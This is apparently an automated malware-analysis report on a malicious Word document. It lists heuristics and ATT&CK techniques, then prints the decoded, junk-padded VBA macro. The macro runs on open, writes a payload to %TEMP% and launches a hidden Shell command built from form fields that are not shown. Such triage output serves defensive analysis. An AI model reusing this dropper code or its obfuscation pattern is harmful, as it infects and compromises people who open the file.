Verdict: MALICIOUS (Risk Score: 278)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1059 Command and Scripting Interpreter
The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening the document. The macro utilizes `Shell()` and `CreateObject()` calls, indicating an attempt to download and execute a second-stage payload. The obfuscated string concatenation within the script suggests an effort to hide the true nature of the payload or its destination. The ClamAV detection of 'Ole2.Macro.Agent' further supports its malicious nature.
Heuristics (10)

- ClamAV: Ole2.Macro.Agent-9858864-1 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Ole2.Macro.Agent-9858864-1
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings). Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched line in script: `Shell yTGliyTIasdd, 0`
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script: `Set hgJBsdasdDD = CreateObject("Scr" + yufGHJ + "g.FileSy" + gUYbjk + "ject")` (followed by `Dim EDNjGrlc, ZcErDyNX, FEhugLeu As String`)
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script: `Sub autoopen()` (preceded by `Attribute VB_Customizable = True`)
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON). Matched line in script: `Set TDYFUGasdDc = hgJBsdasdDD.CreateTextFile(Environ("TEMP") & "\pan" + asjhdbkx + "x", True)` (followed by `Dim IawqTVly, nksXxyIO, ydMjOnnA As String`)
- Heap-spray pattern detected (high, SC_HEAP_SPRAY). Repeated 0x41 (A) bytes found.
  Disassembly:
  Attempted x86 opcode disassembly
- NOP-equivalent sled detected (medium, SC_NOP_EQUIV_SLED). Long run of 0x41 bytes.
  Disassembly:
  Attempted x86 opcode disassembly
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC). OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE). One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8069 bytes |

SHA-256: 95080f497ed431cd6cf3421042b5e990fab8dd47be690f20a4e4c405d4f21764

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 153 of 219 identifiers look randomly generated (e.g. 'hgKjhasdjDDD11'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
Dim hgJBsdasdDD, TDYFUGasdDc
Dim PZOTcVvh, IddlwNtF, MlBwVFiB As String
Dim PWkSOXRl, TXZVrazm, ACSpvtbw As String
PWkSOXRl = " VSQVOK "
TXZVrazm = LTrim(PWkSOXRl)
ACSpvtbw = RTrim(TXZVrazm)
PZOTcVvh = " HBYBNA "
Dim iRrAyvqN, NWWdCTnE, TJZUpakw As String
iRrAyvqN = " KYKFBV "
NWWdCTnE = LTrim(iRrAyvqN)
TJZUpakw = RTrim(NWWdCTnE)
IddlwNtF = LTrim(PZOTcVvh)
Dim vNRhWiWu, aqKpRTRA, haVDPjHp As String
vNRhWiWu = " OLLRCU "
aqKpRTRA = LTrim(vNRhWiWu)
haVDPjHp = RTrim(aqKpRTRA)
MlBwVFiB = RTrim(IddlwNtF)
Dim gAzpgkkf, nUFdJywv, SDnhlLvO As String
gAzpgkkf = " TBGFWQ "
nUFdJywv = LTrim(gAzpgkkf)
SDnhlLvO = RTrim(nUFdJywv)
yTGliyTIasdd = iyUGBKJdasddd.hgKjhasdjDDD1 + iyUGBKJdasddd.hgKjhasdjDDD2 + iyUGBKJdasddd.hgKjhasdjDDD3 + iyUGBKJdasddd.hgKjhasdjDDD4 + iyUGBKJdasddd.hgKjhasdjDDD5 + iyUGBKJdasddd.hgKjhasdjDDD6 + iyUGBKJdasddd.hgKjhasdjDDD7 + iyUGBKJdasddd.hgKjhasdjDDD8 + iyUGBKJdasddd.hgKjhasdjDDD9 + iyUGBKJdasddd.hgKjhasdjDDD10
Dim lWwvOhlk, gWTPrlHl, pXGXvvfm As String
Dim zlChhEUG, CmiAPUtH, LwkDtSZK As String
zlChhEUG = " UVADNI "
CmiAPUtH = LTrim(zlChhEUG)
LwkDtSZK = RTrim(CmiAPUtH)
lWwvOhlk = " HQDJOA "
Dim AFeYjrxM, uOQaEvgQ, SRlwHLyE As String
AFeYjrxM = " ZQKHRD "
uOQaEvgQ = LTrim(AFeYjrxM)
SRlwHLyE = RTrim(uOQaEvgQ)
gWTPrlHl = LTrim(lWwvOhlk)
Dim BbYiBYtl, dhQSrkjz, GnNYDGNw As String
BbYiBYtl = " GWHKPN "
dhQSrkjz = LTrim(BbYiBYtl)
GnNYDGNw = RTrim(dhQSrkjz)
pXGXvvfm = RTrim(gWTPrlHl)
Dim LAgscEzT, tUagBktH, jDDkntia As String
LAgscEzT = " APNCFP "
tUagBktH = LTrim(LAgscEzT)
jDDkntia = RTrim(tUagBktH)
yufGHJ = "iptin"
Dim TGIqKzki, qQhTtcpN, HYVakKaJ As String
Dim ItEKzSbR, RtDrxJCY, byChJWmU As String
ItEKzSbR = " VHJALD "
RtDrxJCY = LTrim(ItEKzSbR)
byChJWmU = RTrim(RtDrxJCY)
TGIqKzki = " CAEVZM "
Dim gGSXWydz, LPlkoAtM, vTaSwXXQ As String
gGSXWydz = " GATHRX "
LPlkoAtM = LTrim(gGSXWydz)
vTaSwXXQ = RTrim(LPlkoAtM)
qQhTtcpN = LTrim(TGIqKzki)
Dim FqUBuYrB, eaDEdkhU, TszcXGBa As String
FqUBuYrB = " PFJDFN "
eaDEdkhU = LTrim(FqUBuYrB)
TszcXGBa = RTrim(eaDEdkhU)
HYVakKaJ = RTrim(qQhTtcpN)
Dim ZVetOHBt, nOYKUKTE, SGlWoYIF As String
ZVetOHBt = " SPGSTC "
nOYKUKTE = LTrim(ZVetOHBt)
SGlWoYIF = RTrim(nOYKUKTE)
gUYbjk = "stemOb"
Dim SwOXlWmc, asFbvYYy, Ecelirhn As String
Dim YHeMMLST, ZJdyfCpY, cJxkIzUI As String
YHeMMLST = " COEZGH "
ZJdyfCpY = LTrim(YHeMMLST)
cJxkIzUI = RTrim(ZJdyfCpY)
SwOXlWmc = " OMJSLI "
Dim twyxzlNO, CSXiLngd, ZIRZyXut As String
twyxzlNO = " JZLQCW "
CSXiLngd = LTrim(twyxzlNO)
ZIRZyXut = RTrim(CSXiLngd)
asFbvYYy = LTrim(SwOXlWmc)
Dim YZmNKJBt, oDOMAgIv, cEGcYNMu As String
YZmNKJBt = " DUGXWB "
oDOMAgIv = LTrim(YZmNKJBt)
cEGcYNMu = RTrim(oDOMAgIv)
Ecelirhn = RTrim(asFbvYYy)
Dim QmlCnQnl, OyXOvDuL, WsISanpe As String
QmlCnQnl = " JXCIAM "
OyXOvDuL = LTrim(QmlCnQnl)
WsISanpe = RTrim(OyXOvDuL)
Set hgJBsdasdDD = CreateObject("Scr" + yufGHJ + "g.FileSy" + gUYbjk + "ject")
Dim EDNjGrlc, ZcErDyNX, FEhugLeu As String
Dim UoqfFTUX, EpmboPtV, vpRQEFZB As String
UoqfFTUX = " CKUSSP "
EpmboPtV = LTrim(UoqfFTUX)
vpRQEFZB = RTrim(EpmboPtV)
EDNjGrlc = " DTFKOR "
Dim xMGYtHAp, aGczkqlz, YPtxRYpL As String
xMGYtHAp = " NFQJVU "
aGczkqlz = LTrim(xMGYtHAp)
YPtxRYpL = RTrim(aGczkqlz)
ZcErDyNX = LTrim(EDNjGrlc)
Dim gtUazCyF, EWSTuIkx, yuabHyaH As String
gtUazCyF = " CQHFQO "
EWSTuIkx = LTrim(gtUazCyF)
yuabHyaH = RTrim(EWSTuIkx)
FEhugLeu = RTrim(ZcErDyNX)
Dim peUDviJz, wolHNXMd, lLCZVVnS As String
peUDviJz = " EDTENY "
wolHNXMd = LTrim(peUDviJz)
lLCZVVnS = RTrim(wolHNXMd)
asjhdbkx = "da.pf"
Dim lwGCMgsK, fxBpflOL, pcowIcuW As String
Dim AlRDCDJX, clFBjKgC, llVqQXSV As String
AlRDCDJX = " MCJVHD "
clFBjKgC = LTrim(AlRDCDJX)
llVqQXSV = RTrim(clFBjKgC)
lwGCMgsK = " HBCRGA "
Dim TlLlYZLy, pgnDLCPV, GpoiykZG As String
TlLlYZLy = " CHIZCY "
pgnDLCPV = LTrim(TlLlYZLy)
GpoiykZG = RTrim(pgnDLCPV)
fxBpflOL = LTrim(lwGCMgsK)
Dim hnRqKHVj, KQLtAfUQ, uABOUBLl As String
hnRqKHVj = " TYMAWV "
KQLtAfUQ = LTrim(hnRqKHVj)
uABOUBLl = RTrim(KQLtAfUQ)
pcowIcuW = RTrim(fxBpflOL)
Dim HFuDZdro, eMLHrail, gNTLTGqE As String
HFuDZdro = " LYKEZI "
eMLHrail = LTrim(HFuDZdro)
gNTLTGqE = RTrim(eMLHrail)
Set TDYFUGasdDc = hgJBsdasdDD.CreateTextFile(Environ("TEMP") & "\pan" + asjhdbkx + "x", True)
Dim IawqTVly, nksXxyIO, ydMjOnnA As String
Dim pVYReBWK, tBHHxrlL, aBNeJoHM As String
pVYReBWK = " QDKMLL "
tBHHxrlL = LTrim(pVYReBWK)
aBNeJoHM = RTrim(tBHHxrlL)
IawqTVly = " YJAYQQ "
Dim GIGOXlOg, mExroFnu, fMfGNWGP As String
GIGOXlOg = " OIQKLW "
mExroFnu = LTrim(GIGOXlOg)
fMfGNWGP = RTrim(mExroFnu)
nksXxyIO = LTrim(IawqTVly)
Dim thsOLeKw, lykdBFrr, WjTuIsDc As String
thsOLeKw = " KJYTUS "
lykdBFrr = LTrim(thsOLeKw)
WjTuIsDc = RTrim(lykdBFrr)
ydMjOnnA = RTrim(nksXxyIO)
Dim MLvcCrto, yNqnvJil, kyCENTsR As String
MLvcCrto = " WINWSR "
yNqnvJil = LTrim(MLvcCrto)
kyCENTsR = RTrim(yNqnvJil)
TDYFUGasdDc.Write (iyUGBKJdasddd.hgKjhasdjDDD11)
Dim tDVDfnzT, lZrjldff, XFkqePCU As String
Dim tBJDSVcb, DRKIEhcG, IRzMCmWH As String
tBJDSVcb = " ZELHXB "
DRKIEhcG = LTrim(tBJDSVcb)
IRzMCmWH = RTrim(DRKIEhcG)
tDVDfnzT = " KZBUJV "
Dim tmsXeXYa, OjLjhkcK, gsAQZShP As String
tmsXeXYa = " JAXVCP "
OjLjhkcK = LTrim(tmsXeXYa)
gsAQZShP = RTrim(OjLjhkcK)
lZrjldff = LTrim(tDVDfnzT)
Dim ojLyNKnL, QZuNOhpd, NldEGawW As String
ojLyNKnL = " MJXJPY "
QZuNOhpd = LTrim(ojLyNKnL)
NldEGawW = RTrim(QZuNOhpd)
XFkqePCU = RTrim(lZrjldff)
Dim TzbgrpYc, JiskTVOU, rfVmiQDK As String
TzbgrpYc = " WCTBTN "
JiskTVOU = LTrim(TzbgrpYc)
rfVmiQDK = RTrim(JiskTVOU)
TDYFUGasdDc.Close
Dim emlXEZBV, atXIARTx, dsIQrlIU As String
Dim TweGLhOb, Axfaflun, xccdIvRA As String
TweGLhOb = " XBRBFA "
Axfaflun = LTrim(TweGLhOb)
xccdIvRA = RTrim(Axfaflun)
emlXEZBV = " BXCUEH "
Dim WCNGkVvp, nLIpRlhz, yFhRJDiM As String
WCNGkVvp = " TTSDGJ "
nLIpRlhz = LTrim(WCNGkVvp)
yFhRJDiM = RTrim(nLIpRlhz)
atXIARTx = LTrim(emlXEZBV)
Dim uaAwOZIe, OsHhlNkx, VzWLcSEt As String
uaAwOZIe = " NMKUJK "
OsHhlNkx = LTrim(uaAwOZIe)
VzWLcSEt = RTrim(OsHhlNkx)
dsIQrlIU = RTrim(atXIARTx)
Dim TTQxGzTx, EjfpDrqW, GxNdgKgy As String
TTQxGzTx = " FAYWIE "
EjfpDrqW = LTrim(TTQxGzTx)
GxNdgKgy = RTrim(EjfpDrqW)
Shell yTGliyTIasdd, 0
End Sub
Attribute VB_Name = "iyUGBKJdasddd"
Attribute VB_Base = "0{66AB4D45-849F-4A75-A347-FBE52CBB66D5}{0584011C-B1B1-4DB6-94FE-EDBE2FAFDE09}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False